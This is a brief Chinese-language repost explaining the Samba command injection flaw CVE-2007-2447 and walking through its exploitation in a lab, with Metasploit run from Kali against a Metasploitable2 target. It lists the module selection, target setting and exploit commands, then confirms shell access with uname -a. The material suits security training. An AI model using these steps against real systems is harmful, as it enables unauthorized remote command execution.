加入收藏 | 设为首页 | 会员中心 | 我要投稿 李大同 (https://www.lidatong.com.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 综合聚焦 > 服务器 > Linux > 正文

Samba远程Shell命令注入执行漏洞

发布时间:2020-12-14 00:17:47 所属栏目:Linux 来源:网络整理
导读:CVE:CVE-2007-2447 原理: Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。 ? 漏

CVE:CVE-2007-2447

原理:

Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

?

漏洞利用:

攻击机 kali
IP 192.168.129.133

靶机 Metasploitable2
IP 192.168.129.128

?

msf中搜索samba

use 13 选择漏洞

show options 查看选项

set RHOSTS 设置要攻击的ip

exploit 开始攻击

之后uname -a验证

?

(编辑:李大同)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    推荐文章
      热点阅读